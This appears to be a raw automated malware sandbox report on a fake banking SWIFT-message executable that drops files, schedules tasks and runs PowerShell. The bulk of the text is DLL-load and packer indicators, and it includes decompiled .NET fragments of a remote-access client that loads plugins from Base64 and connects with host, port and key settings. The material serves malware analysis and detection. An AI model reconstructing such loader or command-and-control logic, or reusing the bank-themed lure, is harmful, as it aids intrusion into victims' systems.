Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: winmm.dll

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: build.exe, 00000009.00000002.2613905318.0000000000C37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @o.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\GTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n(C:\Windows\GTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: GTCv.pdbd source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: GTCv.pdbNFm source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: !!.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: GTCv.pdbSHA256 source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source:	Binary string: \??\C:\Windows\exe\GTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: GTCv.pdb21-2246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.PDB source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbh-? source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?oC:\Users\user\AppData\Roaming\GTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\GTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: GTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source:	Binary string: \??\C:\Windows\GTCv.pdbbu source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\GTCv.pdbpdbTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\GTCv.pdbu source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\GTCv.pdbo source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.PDB9 source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: GTCv.pdbs\GTCv.pdbpdbTCv.pdbGTCv.pdb source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2500060508.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbni source: YkxAHNcqEmoeLS.exe, 0000000E.00000002.2501115309.0000000000D89000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3c7e790.2.raw.unpack, id.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.6f90000.4.raw.unpack, id.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: XClient.exe.7.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.7.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, LogInGUI.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: YkxAHNcqEmoeLS.exe.0.dr, LogInGUI.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, uD92bqTvUTmybDr5iq.cs	.Net Code: CNGOxs38vH System.Reflection.Assembly.Load(byte[])
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, uD92bqTvUTmybDr5iq.cs	.Net Code: CNGOxs38vH System.Reflection.Assembly.Load(byte[])
Source: XClient.exe.7.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: XClient.exe.7.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: XClient.exe.7.dr, Messages.cs	.Net Code: Memory

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static PE information: 0xFA24949B [Wed Dec 27 22:22:19 2102 UTC]

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0127F3F0 push esp; iretd	0_2_0127F3F1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0712C4C0 pushad ; retf	0_2_0712C4C1
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_00A19950 push ss; ret	10_2_00A1995E
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C6C604 push esp; retf	10_2_06C6C605
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C61761 pushad ; ret	10_2_06C61762
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C6C4C0 pushad ; retf	10_2_06C6C4C1
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C60488 push edi; ret	10_2_06C6048A
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C67588 push es; retf	10_2_06C6758A
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C60559 push edi; ret	10_2_06C6055A
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C6052B push edi; ret	10_2_06C60532
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C60528 push edi; ret	10_2_06C6052A
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C6821F push cs; retf	10_2_06C68222
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C603E1 push edi; ret	10_2_06C603E2
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C623E8 push 685806C3h; ret	10_2_06C623EE
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C62390 push 681806C3h; ret	10_2_06C62396
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C60007 push ebx; ret	10_2_06C60032
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C60033 push ebx; ret	10_2_06C6003A
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C60197 push ebp; ret	10_2_06C6019A
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C60193 push ebp; ret	10_2_06C60196
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C681AB push cs; retf	10_2_06C681B2
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C681A8 push cs; retf	10_2_06C681AA
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C68160 push cs; retf	10_2_06C68162
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C68121 push cs; retf	10_2_06C68122
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C68A21 push ss; retf	10_2_06C68A22
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C69BA1 push ds; retf	10_2_06C69BA2
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C67929 push es; retf	10_2_06C67934
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_0A3C0ED5 push E80A995Eh; retf	10_2_0A3C0F61
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF8489DD2A5 pushad ; iretd	21_2_00007FF8489DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF848BC2316 push 8B485F93h; iretd	21_2_00007FF848BC231B

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Static PE information: section name: .text entropy: 7.951448525153002
Source: YkxAHNcqEmoeLS.exe.0.dr	Static PE information: section name: .text entropy: 7.951448525153002

Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, BHGIUkt33in2GYQkha.cs	High entropy of concatenated method names: 'ub0CVhNWX2', 'DkNC5q3eVY', 'ToString', 'bN3ChgDYXB', 'a5HC0CAuMC', 'qQSCecIfiY', 'tCvCD27PA0', 'J0ZCd8a3MZ', 'qZnC8IO2ar', 'm1xCTTZO9Y'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, uD92bqTvUTmybDr5iq.cs	High entropy of concatenated method names: 'Nc7gnRCEaT', 'MltghSlGHb', 'Hnug04gqAr', 'Dmxgev1Y1k', 'AjcgDxgi0N', 'DTZgd7HNds', 'okyg8WsvrN', 'c1VgTbhf8I', 'BwxgUR2RtU', 'hSygVJWQ5P'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, WNIyrR2gZbetm9NxXIe.cs	High entropy of concatenated method names: 'akXNGGJost', 'vYnNztoBYZ', 'AlCYZkm6AW', 'y6xQxWibvvBPqlTMRLe', 'I0AMqmigXeMkceQ8Rwq', 't1RGXMivkDxbl3S8hYU', 'EjYxsOizsvWwFACRvp3', 's0tuetNaVwilWEfjvH8'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, xJE15a2ZtVofEmWbgZl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Eu3vw5rhUR', 'lS3vplUc79', 'yo3v3MNwPT', 'cV7vMNncGJ', 'LAtv1J7hQW', 'jlKvkpE5Pf', 'VaovtZTDQh'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, PatZtba1OW772OCA79.cs	High entropy of concatenated method names: 'nEgqrNbxuI', 'hCEqCnHCem', 'pOeqqy21ba', 'CROqNCOCwo', 'R5SqWShZpY', 'mZwqExwF6J', 'Dispose', 'HLUPhMxtQB', 'Qy7P0COClX', 'glvPeVideG'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, b4e5t9y68J9QyCY9UQ.cs	High entropy of concatenated method names: 'd418lA6Exo', 'UFQ8K9VfVB', 'qYN8xuKgI4', 'jR28m3ftDj', 'ODm89kUuqr', 'rbC8ccLMgH', 'MFj8opvk4V', 'nMq8Hy3Wfn', 'ErW8LuovfW', 'k758BPODK5'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, VJtol8RCSbLjFqUjHZ.cs	High entropy of concatenated method names: 'CZn8hvCqMN', 'z628eK0n3L', 'Gyn8dBEVDw', 'lCYdGI3BXH', 'rAqdzGGnGw', 'Dtx8ZGsPGd', 'RRh82OQLQ2', 'ywe8IfKj29', 'rD18gEO3Ak', 'sEZ8OZJV4f'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, MISbcKHd5xLHqRIyc7.cs	High entropy of concatenated method names: 'vrf0M1bNZH', 'IP401LCpBA', 'NrO0k7pIYJ', 'DdP0tPiIDc', 'VgV0fmLlMO', 'XPv0ib3Y3x', 'bOY0aEGTil', 'F4L0XHbOXD', 'lTS06UJ5WZ', 'Vw50GEhP9c'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, bf5TdtO8PESwqILux8.cs	High entropy of concatenated method names: 'Lls28ISbcK', 'i5x2TLHqRI', 'qJ32VDxn5S', 'Uvv25kXLwm', 'Qh12rarFTi', 'uNR27BUVmy', 'vYnhge9DuvcNS740B1', 'B54PUmFmxk2GAGglKn', 'crU22hIgcn', 'Eoe2gPILOn'
